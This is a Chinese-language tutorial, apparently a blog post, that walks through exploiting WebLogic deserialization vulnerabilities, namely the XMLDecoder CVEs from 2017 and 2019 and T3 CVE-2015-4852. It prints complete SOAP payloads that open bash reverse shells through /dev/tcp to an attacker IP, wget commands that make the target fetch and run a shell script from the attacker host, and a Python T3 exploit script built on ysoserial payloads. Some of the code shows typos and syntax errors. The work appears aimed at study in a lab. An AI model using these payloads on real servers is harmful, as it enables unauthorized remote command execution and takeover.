JAVA安全

Weblogic反序列化漏洞

WeblogicXMLdecoder反序列化

1. XMLDecode 反序列化

1.1 XMLEncoder&XMLDecoder

XMLDecoder/XMLEncoder是在JDK1.4版中添加的XML格式序列化持久性方案,使用XMLEncoder来生成表示JavaBeans组件(bean)的XML文档,用XMLDecoder读取使用XMLEncoder创建的XML文档获取JavaBeans。

1.2 XML标签

  1. string标签

​ 字符串“Hello,world”表示如下:

1
<string>Hello,world</string>
  1. object标签

​ 通过标签表示对象,其class属性指定具体类(用于调用其内部方法),method属性指定具体方法名称(比如构造函数的的方法名为 new )。

1
new JButton("Hello,worIld");		//等价于 JButton jb = new JButton("Hello,worIld");

对应的XML文档如下:

1
2
3
<object class="javax.swing.JButton" method="new">
	<string>Hello,world</string>
</object>;
  1. void标签

​ 通过标签表示函数调用、赋值等操作,method属性指定具体的方法名称。

1
2
JButton b = new JButton();
b.setText("Hello, worId");

对应的XML文档如下:

1
2
3
4
5
<object class="javax.swing.JButton">
	<void method="setText">
		<string>Hello,world</string>
	</void>
</object>

4.array标签
通过标签表示数组,class属性指定具体类,在array标签内部使用void标签的index属性来指定数组索引赋值。

1
2
String[] s = new String[2];
s[1] = "Hello,world";

对应的XML文档如下:

1
2
3
4
5
<array class="java.lang.String" 1ength="2">
	<void index="1">
		<string>Hello,world</string>
	</void>
</array>

1.3 WeblogicXMLdecoder反序列化实例

XML文档:

java头指定java版本和使用的XMLDecoder类,用来进行xml文档反序列化

object对象指定创建进程的类(ProcessBuilder),可以用于命令执行

array数组长度为1,传入的值为calc(计算器)

然后再调用start方法

1
2
3
4
ProcessBuilder pb = new ProcessBuilder(s[0]);
String[] s = new String[1];
s[0] = "calc";
pb.start();

Test.java:

把poc.xml的xml文档传入,调用a.readObject反序列化成对象,然后运行系统命令,弹出计算器

2. CVE-2017-3506(xml数据无校验)

2.1 漏洞简介

​ WebLogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的SOAP(XML)数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

影响版本:10.3.6.0,12.1.3.0,12.2.1.1,12.2.1.2

2.2 漏洞分析

2.2.1 判断漏洞存在

若访问/wls-wsat/CoordinatorPortType,出现如下页面,则可能存在此漏洞。

只要在wls-wsat这个war包中的uri皆受到影响,打开web.xml查看所有受到影响的uri路径。

1
2
3
4
5
6
7
8
9
默认受到影响的uri如下:
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

2.3 漏洞复现

​ 访问http://192.168.219.185:7001/wls-wsat/CoordinatorPortType,而后使用brup拦截该请求,修改请求方法为POST,而后修改 Content-Type为text/xml。

在正文中填入如下payload进行利用,这里是使用bash进行反弹shell。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
	<soapenv:Header>
		<work:WorkContext xm1ns:work="http://bea.com/2004/06/soap/workarea/">
			<java class="java.beans.XMLDecoder">
				<object class="java.lang.ProcessBuilder">
					<array class="java.lang.String" 1ength="3">
						<void index="0"><string>/bin/bash</string></void>
						<void index="1"><string>-c</string></void>
						<void index="2"><string>bash -i &gt;&amp; /dev/tcp/192.168.219.134/4444 0&gt;&amp;1</string></void>
					</array>
				<void method="start"></void>
				</object>
			</java>
		</work:WorkContext>
	</soapenv:Header>
	<soapenv:Body/>
</soapenv:Envelope>

注意:反弹shell命令中的>&转换成了实体编码&gt;&amp;

在kali中使用nc监听4444端口。

3. CVE-2017-10271(黑名单过滤object标签,void标签绕过)

3.1 漏洞简介

​ 在更新CVE-2017-3506补丁之前,不对用户输入的SOAP(XML)数据进行验证,在其中使用object标签就可以进行远程命令执行,CVE-2017-3506的补丁在weblogic/wsee/workarea/WorkContextXmlInputAdapter.java中添加了validate方法,在解析xml时,Element字段出现object标签就抛出运行时异常,不过这次防护力度不够,导致了CVE-2017-10271,利用方式与CVE-2017-3506类似,使用了void标签绕过CVE-2017-3506的补丁,从而进行远程命令执行。

影响版本:10.3.6.0,12.1.3.0,12.2.1.1,12.2.1.2

3.2 漏洞复现

​ CVE-2017-10271与CVE-2017-3506的复现过程相似,只不过**需要将objec标签替换成void**进行利用。访问http://192.168.219.185:7001/wls-wsat/CoordinatorPortType,而后使用brup拦截该请求,修改请求方法为POST,而后修改Content-Type为text/xml。
​ 在正文中填入如下payload进行利用,这里是使用bash进行反弹shell。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
	<soapenv:Header>
		<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
			<java class="java.beans.XMLDecoder">
				<void class="java.lang.ProcessBuilder">
					<array class="java.lang.String" length="3">
						<void index="0"><string>/bin/bash</string></void>
						<void index="1"><string>-c</string></void>
						<void index="2"><string>bash -i &gt;&amp; /dev/tcp/192.168.219.134/4444 0&gt;&amp;1</string></void>
					</array>
				<void method="start"></void>
				</void>
			</java>
		</work:WorkContext>
	</soapenv:Header>
	<soapenv:Body/>
</soapenv:Envelope>

在kali中使用nc监听4444端口。

3.2.1 复现过程

访问网页,出现此页面,表示存在漏洞

bp抓包,修改请求方法为POST,而后修改Content-Type为text/xml,然后写入payload

原始包:

修改后包:

响应包返回500

kali上开启监听4444端口,并收到反弹的shell

4. CVE-2019-2725(新路径,依旧无校验)

4.1 漏洞介绍

该漏洞依l日是根据weblogic的xmldecoder反序列化漏洞,WebLogic部分版本中默认包含wls9_async_response包,为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意HTTP请求,获得目标服务器的权限,在未授权的情况下远程执行命令。

影响版本:10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0

4.2 漏洞分析

CVE-2019-2725漏洞与前两个漏洞相似,只不过利用的是wIs9_async_response这个war包,若访问/_async/AsyncResponseService,响应如下页面,则可能存在该漏洞。

若访问/_async/,响应403,也可能存在漏洞。

只要是在bea_wls9_async_response包中的uri皆受到影响,可以打开web.xml查看所有受到影响的uri。

1
2
3
4
5
默认受影响的uri:
/_async/AsyncResponseService
/_async/AsyncResponseServiceJms
/_async/AsyncResponseServiceHttp
返回页面均为上面的页面

4.3 漏洞复现

​ CVE-2017-10271与前面的两个漏洞复现过程相似,利用点在bea_wIs9_async_response包中的uri。访问http://192.168.219.185:7001/async/AsyncResponseService,而后使用brup拦截该请求,修改请求方法为POST,而后修改Content-Type为text/xml。
​ 在正文中填入如下payload进行利用,这里是使用bash进行反弹shell。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"xmlns:asy="http://www.bea.com/async/AsyncResponseService">
	<soapenv:Header><wsa:Action>xx</wsa:Action>
		<wsa:RelatesTo>xx</wsa:RelatesTo>
		<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java class="java.beans.XMLDecoder">
                <void class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="3">
                    <void index="0"><string>/bin/bash</string></void>
                    <void index="1"><string>-c</string></void>
                    <void index="2"><string>bash -i &gt;&amp; /dev/tcp/192.168.116.63/4444 0&gt;&amp;1</string></void>
                    </array>
                    <void method="start"/>
                </void>
			</java>
		</work:WorkContext>
	</soapenv:Header>
	<soapenv:Body>
        <asy:onAsyncDelivery/>
    </soapenv:Body>
</soapenv:Envelope>

此处还是用void标签替代了object标签

页面响应202

反弹shell成功

5. CVE-2019-2729

5.1 漏洞介绍

​ CVE-2019-2729漏洞是对CVE-2019-2725漏洞补丁进行绕过,形成新的漏洞利用方式,属于CVE-2019-2725漏洞的变形绕过。与CVE-2019-2725漏洞相似,CVE-2019-2729漏洞是由于应用在处理反序列化输入信息时存在缺陷,攻击者可以通过发送精心构造的恶意HTTP请求,用于获得目标服务器的权限,并在未授权的情况下执行远程命令,最终获取服务器的权限。

影响版本:10.3.6.0,12.1.3.0,12.2.1.3

5.2 漏洞复现

漏洞利用工具:https://github.com/ruthlezs/CvE-2019-2729-Exploit/blob/master/oracle-weblogic-deserialize.py

​ 前面CVE-2017-3506的补丁是过滤了object,CVE-2017-10271的补丁是过滤了new,method标签,且void后面只能跟index,array后面可以跟class,但是必须要是byte类型的。
​ 而CVE-2019-2725的补丁也是使用黑名单禁用了class标签,但是我们可以使用代替class标签即可。

方法一:

​ 访问http://192.168.219.185:7001/wls-wsat/CoordinatorPortType,而后使用brup拦截该请求。

​ 将利用工具中的req.txt提取出来,放于请求中,请求头部添加lfcmd字段,填写whoami命令,用于验证。发送后查看到命令回显。

方法二:

​ 直接使用工具

1
2
python oracle-weblogic-deserialize.py -u http://192.168.116.67:7001/ -c id
python oracle-weblogic-deserialize.py -u http://192.168.116.67:7001/ -c "ls /"

方法三:

在kali上的/tmp下编写一个shell脚本(shell.sh),用bash进行反弹shell,内容如下:

1
bash -i >& /dev/tcp/192.168.116.63/4444 0>&1

而后在kali的/tmp下,使用”python -m SimpleHTTPServer”,开启一个HTTP服务,后续让Weblogic服务器获取shell.sh。
在kali上使用漏洞利用工具,执行wget命令让Weblogic服务器下载kali中tmp目录下的shell.sh。

1
python oracle-weblogic-deserialize.py -u http://192.168.116.67:7001/ -c "wget http://192.168.116.63:8000/shell.sh -P /tmp"

使用”nc -lvp 4444”,监听4444端口。
在kali上使用漏洞利用工具,让服务器执行shell.sh,获取反弹shell。若无法获取shell,可以使用“bash shell.sh”。

1
python oracle-weblogic-deserialize.py -u http://192.168.116.67:7001/ -c "sh shell.sh"

查看nc,发现shell连接成功。

Weblogic_T3反序列化

1 前置知识

​ WebLogic的T3协议是WebLogic Server使用的一种专有通信协议,主要用于服务器之间的远程调用和客户端

与服务器之间的通信。

1.1 RMI协议

​ RMI(RemoteMethod Invocation)即远程方法调用。它能够让在某个Java虚拟机上的对象像调用本地对象一样调用另一个Java虚拟机中的对象上的方法。它支持序列化的Java类的直接传输

​ JavaRMI的默认基础通信协议为JRMP,但其也支持开发其他的协议用来优化RMI的传输,或者兼容非VM,如WebLogic的T3和兼容CORBA的IIOP。

RMI远程方法调用的过程一般有以下几个部分参与:

  1. 客户端对象(RMI Client)
  2. 服务端对象(RMI Server)
  3. 客户端代理对象(stub):远程对象在客户端上的代理。
  4. 服务端代理对象(skeleton):读取客户端传递的方法参数,调用服务器方的实际对象方法,并接收方法执行后的返回值。
  5. RMI注册表(RMIregister):其中注册了远程对象,并由RMI客户端查找已注册的远程对象。其以URL形式注册远程对象,并向客户端回复对远程对象的引用。

RMI调用流程如图:

  1. 服务端创建并注册远程对象,用于客户端访问。
  2. 客户端使用JNDI lookup去查找远程服务器上的RMI服务上的远程对象。
  3. RMI register返回给客户端远程对象的Stub。
  4. 客户端通过Stub对象调用远程主机对象上的方法。
  5. Stub代理客户端处理远程对象调用请求,并且序列化调用请求后通过IRMP协议传输,发送给服务端。
  6. 服务端接收到请求后,Skeleton调用方法。
  7. 服务端进行执行然后将返回的结果对象传给Skeleton对象。
  8. Skeleton接收到结果对象,代理服务端将结果进行序列化,而后发送给客户端
  9. 客户端Stub对象接收到序列化的结果对象,并交由客户端反序列化结果对象

1.2 Weblogic RMI

​ WebLogic RMI 可以说是WebLogic对 Java RMI 的实现,与上述的Java RM调用过程基本一样,在功能和实现方法上有些差异,两者差异如下:

  • WebLogic RMI支持集群部署和负载均衡。
  • webLogic支持stub和skeleton动态生成,将对象部署到RMI注册中心或JNDI时,webLogic将自动生成必要的代理。
  • WebLogicRMI在进行数据传输时,主要使用自己私有的T3协议进行通信(还有基于CORBA的IIOP协议)。

1.3 T3协议

​ T3协议是WebLogic私有的协议,相比于JRMP协议多了如下的一些特性:

  1. 服务端可以持续追踪监控客户端是否存活(心跳机制),通常心跳的间隔为60秒,服务端在超过240秒未收到心跳即判定与客户端的连接丢失。
  2. 通过建立一次连接可以将全部数据包传输完成,优化了数据包大小和网络消耗。

1.4 JNDI

​ JNDI(JavaNaming and Directory Interface)是SUN公司提供的一种标准的]ava命名系统接口,JNDI提供统一的客户端API,为开发人员提供了查找和访问各种命名和目录服务的通用、统一的接口。JNDI可以兼容和访问现有目录服务如:DNS、XNam、LDAP、CORBA对象服务、文件系统、RMI、DSMLv1&v2、NIS等。
如下:

1
2
3
jdbc://<domain>:<port>
rmi://<domain>:<port>
1dap://<domain>:<port>

1.5 WebLogicT3反序列化漏洞简介

​ WebLogic T3 反序列化漏洞从利用方式来划分可以分为前后期,前期直接通过T3协议发送恶意反序列化对象,后期为利用T3协议配合JRMP或INDI接口反向发送反序列化数据。

WebLogicT3反序列化历史漏洞:

CVE号 受影响的组件 受影响版本
CVE-2018-3252 WLS Core Components 10.3.6.0, 12.1.3.0, 12.2.1.3
CVE-2018-3245 WLS Core Components 10.3.6.0, 12.1.3.0, 12.2.1.3
CVE-2018-3191 WLS Core Components 10.3.6.0, 12.1.3.0, 12.2.1.3
CVE-2018-2893 WLS Core Components 10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3
CVE-2018-2628 WLS Core Components 10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3
CVE-2017-3248 Core Components 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1
CVE-2016-3510 Oracle WebLogic Server 10.3.6.0, 12.1.3.0, 12.2.1.0
CVE-2016-0638 Oracle WebLogic Server 10.3.6, 12.1.2, 12.1.3, 12.2.1
CVE-2015-4852 Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, 12.2.1.0

其中前期利用方式有CVE-2015-4852、CVEs2016-0638、CVE-2016-3510等。
而后期利用方式有CVE-2017-3248、CVE-2018-2628、CVE-2018-2893、CVE-2018-3191、CVE-2018-3245等。

2 漏洞原理分析

2.1 T3协议流量分析

​ 利用相关漏洞利用工具与weblogic进行T3协议的通信,并实现weblogic rmi的调用过程,并使用wireshark抓取通信流量。找到响应的tcp数据包,右键->追踪流->TCP流。

通信过程的TCP流:

然后查看客户端发送的序列化数据的对应包,如下图:

这个数据包主要由四部分组成:

  1. 数据包长度。
  2. T3协议头。
  3. 反序列化标志:T3协议中每个反序列化数据包前面都带有 fe 01 00 00,而后再加上Java反序列化标志ac ed 00 05。
  4. 序列化数据。
    (注意:Java反序列化数据开头包含两字节的魔术数字,这两个字节始终为十六进制的0xac 0xed,接下来是两字节的版本号这里为0x00 0x05。在T3协议的数据包中,在这个四个字节前还有四个字节fe 01 00 00)

​ 这里的数据包只是我们使用漏洞利用工具发送的,其中就只有一段序列化数据,有时候并不只发送一段序列化数据,它可能会发送多个序列化数据,彼此之间以反序列化标志隔开,如下图:

T3数据包主要内容如下:

​ 从上面我们可以知道第二到第七部分内容,开头都是aced0005,说明这些都是AVA序列化的数据。只要把其中一部分替换成我们的序列化数据就可以了,于是我们可以将第二至七部分的AVA序列化数据的任意一个替换为恶意的序列化数据,或者直接将第一部分与恶意的序列化数据进行拼接后发送给服务端即可。

2.2 CVE-2015-4852漏洞分析

​ CVE-2015-4852可以说是WebLogicT3反序列化漏洞的开端,接下来我们将从这个漏洞去了解WebLogicT3反序列化漏洞。
​ 网上有许多针对CVE-2015-4852的exp,在网上找到以下python脚本与ysoserial工具进行漏洞利用。脚本功能如下:

  1. 使用ysoserial工具生成的一个payload,其利用链为CommonsCollections1,执行的命令为在被攻击服务器的tmp下创建一个名为test_t3.txt的文件。
  2. 将上述已生成的payload添加到T3协议的数据包中,即将T3协议数据包第一部分与恶意的序列化数据进行拼接后发送给服务端。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
import struct 	# 负责大小端的转换
import subprocess
import socket
import re
import binascii

def generatePayload(gadget,cmd):
	YSO_PATH = "ysoserial-master.jar"
	popen = subprocess.Popen(['java', '-jar',YSO_PATH, gadget, cmd],stdout=subprocess.PIPE)
	return popen.stdout.read()

def T3Exploit(ip,port,payload):
    #初始化socket,前者指定用于服务器与服务器之间的网络通信,后者指定基于TCP的流式socket通信
	sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    sock.connect((ip,port))			# 建立socket连接
    handshake = "t3 12.2.3\nAS:255\nHL:19\nMS:10000000\n\n" # socket握手消息
    sock.sendall(handshake.encode())
    data=sock.recv(1024)		#接收第一个socket数据包,HELO
    data1=sock.recv(1024)		#接收第二个socket数据包,:10.3.6.0.false
    isweblogic= re.compile("HELO").findall(data.decode()	# 匹配字段中有无HELo
    version=re.compile(":(.*).0.false").findall(datal.decode()	#使用正则匹配服务器握手消息中返回的weblogic版本号
    if isweblogic and version:
   		print("webLogic:"+"".join(version))		#输出weblogic版本号
    else:
		print("NotWebLogic")					#对端可能不是weblogic
    header=binascii.a2b_hex(b"00000000")		#先占位4个字节,这四个字节表示数据包长度
    # 以下为t3协议头		
                                                t3header=binascii.a2b_hex(b"016501ffffffffffffffff000000690000ea60000000184e1cac5d00dbae7b5fb5f04d7a1678d3b7d14d11bf136d67027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006")
    desflag=binascii.a2b_hex(b"fe010000")		#反序列化数据标志fe010000,
    payload= header + t3header + desflag+ payload #将各部分拼接,将ysoserial生成payload添加到后面
    #计算payload长度,并将长度字段放于前四个字节
    payload = struct.pack(">I", len(payload)) + payload[4:]
    sock.send(payload)
if __name__=="__main_":
    ip = "192.168.219.206"
    port = 7001
    gadget="CommonsCollections1" 			#指定使用commonscollectionsl反序列化利用链
    cmd="touch /tmp/test_t3.txt"			#让被攻击服务器执行的指定命令,创建一个文件
    payload = generatePayload(gadget, cmd) 	# 仲用ysoserial生成payload

​ 漏洞的触发点在wIserver\server\lib\wIthint3client.jar\weblogic\rjvmNnboundMsgAbbrev.class中,其中的readObject()方法会处理使用T3协议传入的序列化数据。在readObject(方法中又去调用了InboundMsgAbbrev.ServerChannelInputStream的readObjec方法,这里的var1即是Java序列化数据。

​ 查看ServerChannellnputStream这个类,发现其继承于ObjectinputStream,而且并没有重写readObject()方法,可以说这里没有对传入的序列化数据做任何处理,直接传入ObjectInputStream的readObject()方法中进行反序列化操作。

​ 而weblogic这个版本自带Apache Commons Collections3.2.0,于是我们可以利用ysoserial生成CommonsCollections1的payload进行利用,于是我们将T3协议的序列化数据替换成这个生成的payload即可触发反序列化漏洞。